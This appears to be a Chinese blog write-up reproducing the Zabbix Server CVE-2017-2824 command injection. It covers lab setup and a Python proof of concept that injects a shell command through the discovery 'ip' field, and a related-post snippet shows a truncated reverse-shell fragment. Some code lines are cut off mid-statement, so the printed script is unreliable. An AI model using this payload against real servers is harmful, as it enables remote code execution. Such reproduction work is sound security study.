php-proxy3 漏洞,Zabbix Server Active Proxy Trappe RCE 漏洞详解(CVE-2017-2824)

最新推荐文章于 2024-05-07 10:23:13 发布
最新推荐文章于 2024-05-07 10:23:13 发布
阅读量507 收藏 1
点赞数
文章标签: php-proxy3 漏洞

前言

有点相似Zabbix是一种企业监控解决方案,旨在使组织能够监控其网络中各种系统的健康状况和状态,包括:网络服务,服务器和网络设备。前些日子Lilith Wyatt of Cisco ASIG 发现利用命令注入的形式可以在Zabbix Server上实现远程代码执行,影响的版本为Zabbix 2.4.7 – 2.4.8r1。在复现过程中发现利用条件比较苛刻,首先需要能访问到Zabbix Server监听的10051端口,另外需要配置Proxy,以及相应的Action来自动添加Host,从而达到利用ip参数进行命令注入。

1. 基础工作

下载centos7 用virtualbox进行运行,接下来就是安装php mysql apache等相关基础运行环境。关闭SELinux和防火墙以及启动httpd,mariadb。添加zabbix组和用户,zabbix_server组件默认会用zabbix用户启动

yum install php php-mysql php-gd php-pear mariadb-server mariadb

systemctl start mariadb

systemctl start httpd

systemctl stop firewalld.service

setenforce 0

groupadd zabbix

useradd -g zabbix zabbix

2. 编译安装Zabbix

2.1 下载有漏洞的版本

wget [https://nchc.dl.sourceforge.net/project/zabbix/ZABBIX%20Latest%20Stable/2.4.7/zabbix-2.4.7.tar.gz](https://nchc.dl.sourceforge.net/project/zabbix/ZABBIX%20Latest%20Stable/2.4.7/zabbix-2.4.7.tar.gz)

2.2 安装依赖

yum install -y curl curl-devel mydql-devel net-snmp snmp net-snmp-devel perl-DBI php-gd php-xml php-bcmath php-mbstring php-ldap php-odbc php-xmlrpc

2.3 编译并安装

可以修改--prefix参数来选择安装目录

tar -xvf zabbix-2.4.7.tar.gz

cd zabbix-2.4.7/

./configure --prefix=/usr/local/zabbix --enable-server --enable-agent --enable-proxy --with-mysql --enable-net-snmp --with-libcurl

make

make install

2.4 导入数据

mysql -uroot

>create database zabbix character set utf8 collate utf8_bin;

>use zabbix;

>source /root/zabbix-2.4.7/database/mysql/schema.sql

>source /root/zabbix-2.4.7/database/mysql/images.sql

>source /root/zabbix-2.4.7/database/mysql/data.sql

3. 安装Zabbix Web界面

3.1 复制PHP文件到web目录

mkdir /var/www/html/t

cd frontends/php

cp -a . /var/www/html/t

cd /var/www/html/t

chown apache:apache -R .

3.2 修改php.ini

由于访问setup.php时需要符合一定的配置

post_max_size = 16M

max_execution_time = 300

max_input_time = 300

date.timezone = Asia/Shanghai

allow_url_fopen = On

3.3 安装前端

访问虚拟机的80端口进行安装,安装后默认登录凭证是Admin/zabbix

4 漏洞复现

4.1 添加 proxy

Administration > proxies > Create proxy

记下填写的name

4.2 创建 Action

configuration > action > Event source(Discovery)> Create Action配置好条件和操作,操作为Add host

520352addb8a5e11e4aeb4157e5debb4.png

a2d42568fdbd98b8b4754f01c78dcbfe.png

4.3 触发漏洞

当zabbix_server启动时会监听在10051端口,该端口如果对外开放,攻击者可以利用zabbix协议的command功能调用数据库中特定的脚本,只需要提供interface表中的hostid参数。在调用脚本时,{HOST.CONN}会被替换成表中的ip。由于插入的ip数据没有被过滤则将发生命令注入,严重时可以反弹shell等。默认情况下,未经身份验证(需通过Zabbix授权)的攻击者无法做到这一点。要利用该漏洞还需要以下条件:配置好Action的自动发现功能,该功能可以将恶意的数据插入到interface表(配合Add host操作),从而可以进行命令注入攻击。

import socket

import struct

import json

ZABBIX_HOST = "192.168.1.12"

ZABBIX_PORT = 10051

def send_to_zabbix(data):

client = socket.socket()

client.connect((ZABBIX_HOST,ZABBIX_PORT))

packet = "ZBXD\x01" + struct.pack('

client.sendall(packet)

head = client.recv(1024)

if "ZBXD" not in head:

client.close()

return head

pkt_len = struct.unpack('

data = client.recv(pkt_len[0])

client.close()

return data

data = """{"request":"command","scriptid":1,"hostid":10107}"""

discovery = """{

"request": "discovery data",

"host": "test",

"clock":1485353070,

"data": [

{

"clock":1485353070,

"drule":2,

"dcheck":2,

"type":0,

"ip":";whoami > /tmp/pwned;",

"dns":"abc.com.cc",

"port":10050,

"key":"zzztest",

"status":0,

"value":"fuck"

}

]

}

"""

#利用自动发现功能添加Host

#可以‘select * from interface;’ 查看是否自动添加成功

print send_to_zabbix(discovery)#利用命令注入进行攻击# scriptid == 1 == /bin/ping -c {HOST.CONN} 2>&1

print send_to_zabbix(data)

hostid添加到interface表后需要自己查看修改。

运行后可以看到生成了/tmp/pwned文件

5. 参考

weixin_39663970
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Windows 2003 Server远程代码执行漏洞集合
谢公子的博客
01-14 6157
目录 MS08-067 CVE-2017-7269 MS08-067 发布日期:2008/10/22 针对端口:139、445 漏洞等级:高危 漏洞影响:服务器服务中的漏洞可能允许远程执行代码 受影响的操作系统: Windows 2000;XP;Server 2003;Vista;Server 2008;7 Beta 漏洞原理:攻击者通过特制的RPC请求发给存在漏洞的主机,将可导...
zabbix最新漏洞,可绕过认证登陆!
笨办法学linux的博客
08-26 1669
Zabbix是一个非常流行的开源监控平台,用于收集、集中和跟踪整个基础设施中的CPU负载和网络流量等指标。式,导致在启动SAML SSO认证模式的前提下,恶意用户可通过构造特殊请求绕过认证,获取管理员权限,进而可实现RCE。...
zabbix后台RCE
weixin_44508748的博客
11-24 1293
vulhub有现成的zabbix环境 git clone --depth=1 https://github.com.cnpmjs.org/vulhub/vulhub.git cd vulhub/zabbix/CVE-2016-10134/ docker-compose up -d zabbix默认口令admin\zabbix 1.写脚本 http://1.1.1.1/zabbix/zabbix.php?action=script.edit&scriptid=4 bash -i>&
致远M3移动办公系统平台存在敏感信息泄露/未授权访问漏洞
最新发布
weixin_43167326的博客
05-07 1064
致远M3移动办公是致远互联打造的一站式智能工作平台,提供全方位的企业移动业务管理,致力于构建以人为中心的智能化移动应用场景,促进人员工作积极性和创造力,提升企业效率和效能,是为企业量身定制的移动智慧协同平台。在致远M3 server以下日志文件允许未授权访问泄露登陆用户名及session等敏感信息。
漏洞复现--Zabbix远程代码执行漏洞CVE-2020-11800含EXP)
HengMengSec的博客
08-21 1982
漏洞复现--Zabbix远程代码执行漏洞CVE-2020-11800含EXP)
致远 M3 移动工作平台 V3.1.0安装维护手册.pdf
04-08
致远 M3 移动工作平台 V3.1.0安装维护手册.pdf
jupyter-server-proxy:Jupyter笔记本服务器对代理Web服务的扩展
02-04
除了提供主要功能的python软件包外,JupyterLab扩展名( @jupyterlab/server-proxy )在JupyterLab启动器窗口中还提供了一些按钮,例如RStudio。 注意:该项目以前称为nbserverproxy 。 由于nbserverproxy是...
php-proxy:简单PHP代理脚本
05-16
如何使用将脚本复制到PHP Web服务器的可公开访问的文件夹中(该脚本是独立的并且没有PHP依赖项) 发出针对此脚本的cURL请求添加具有身份验证密钥的Proxy-Auth标头添加具有代理请求的URL的Proxy-Target-URL标头(可选...
详解webpack-dev-server使用http-proxy解决跨域问题
01-19
http-proxy-middleware——webpack-dev-server的实现方法其实是对这个的封装 配置http-proxy 在webpack的配置文件(webpack.config.js)中进行配置 module.exports = { ...此处省略一万字 // webpack-dev-server...
koa-server-http-proxy:一种koa-http-proxy-中间件
02-03
koa-server-http-proxy koa2 http-proxy-middleware。安装$ npm install koa-server-http-proxy --save例const Koa = require ( 'koa' )const app = new Koa ( )const proxy = require ( 'koa-server-http-proxy' )...
Cloudflare-Proxy-Server:Cloudflare代理服务器
05-01
3. **SSL/TLS加密**:免费提供SSL证书,确保用户与网站之间的通信是安全的。 4. **性能优化**:通过缓存静态资源、压缩数据、最小化HTTP请求等方式,提升网站的加载速度。 5. **防火墙与安全规则**:自定义的安全...
vulhub漏洞复现77_zabbix
weixin_44193247的博客
02-14 1536
vulhub漏洞复现练习篇
爬虫模拟登录和代理及正则
markshui的博客
08-26 1651
爬虫模拟登录和代理设置 一、cookie和session cookie 是网站用来辨别用户身份,进行会话跟踪,存储在本地终端上的数据 session(会话)本来含义是指有始有终的一系列动作和消息,在 web 中,session 主要用来在服务器端存储特定用户对象会话所需要的信息 cookie原理: cookie 由服务器产生,浏览器第一次请求,服务器发送给客户端进而保存,浏览器继续 访问时,就会在请求头的 cookie 字段上附带 cookie 信息,这样服务器就可以识别是谁在访问了,但是 cookie 存
Zabbix爆高危漏洞CVE-2017-2824
Listen2You的博客
05-10 4087
导读 zabbix能监视各种网络参数,保证服务器系统的安全运营;并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。   关于Zabbix zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。 zabbix能监视各种网络参数,保证服务器系统的安全运营;并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题
魅课 OM视频会议系统 proxy.php 文件包含漏洞
weixin_46801402的博客
02-07 330
魅课 OM视频会议系统 proxy.php 文件包含漏洞
Zabbix Server trapper命令注入漏洞CVE-2017-2824)
EC_Carrot的博客
08-21 989
漏洞简介 Zabbix Server是拉脱维亚Zabbix SIA公司的一套应用于服务器端的开源的监控系统。该系统可监视各种网络参数,并提供通知机制让系统管理员快速定位、解决存在的各种问题。 Zabbix Server 2.4.X版本中的trapper command功能存在远程代码执行漏洞。远程攻击者可利用该漏洞注入命令,执行代码。 漏洞复现 使用这个简单的POC来复现漏洞: import sys import socket import json import sys def send(ip, da
Zabbix Server trapper两个命令注入漏洞CVE-2017-2824和CVE-2020-11800)
黑白的博客
05-02 2187
声明 好好学习,天天向上 CVE-2017-2824 漏洞描述 Zabbix 是由Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构。其Servertrapper command 功能存在一处代码执行漏洞,特定的数据包可造成命令注入,进而远程执行代码。攻击者可以从一个Zabbix proxy发起请求,从而触发漏洞。 影响范围 Zabbix 2.4.7 - 2.4.8r1 复现过程 这里使用3.0.3版本 使用vulhub /app/vulhub-m
漏洞复现-zabbix系列
aming小老弟
01-09 5619
Zabbix SIA Zabbix是拉脱维亚Zabbix SIA公司的一套开源的监控系统。基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。该系统支持网络监控、服务器监控、云监控和应用监控等。能监视各种网络参数,保证服务器系统的安全运营;并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。zabbix由2部分构成,zabbix server与可选组件zabbix agent。
BUU一血![Zabbix]CVE-2016-10134
qq_43801002的博客
04-25 911
zabbixzabbix([`zæbiks])是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。 zabbix能监视各种网络参数,保证服务器系统的安全运营;并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。 zabbix由2部分构成,zabbix server与可选组件zabbix agent。 zabbix server可以通过SNMP,zabbi...
zabbix-proxy 安装
05-20
注意:将 `<Zabbix Server IP>`、`<Hostname of Zabbix Proxy>`、`<Zabbix database name>`、`<Zabbix database username>`、`<Zabbix database password>`、`<Zabbix database host>`、`<Zabbix database port>` ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值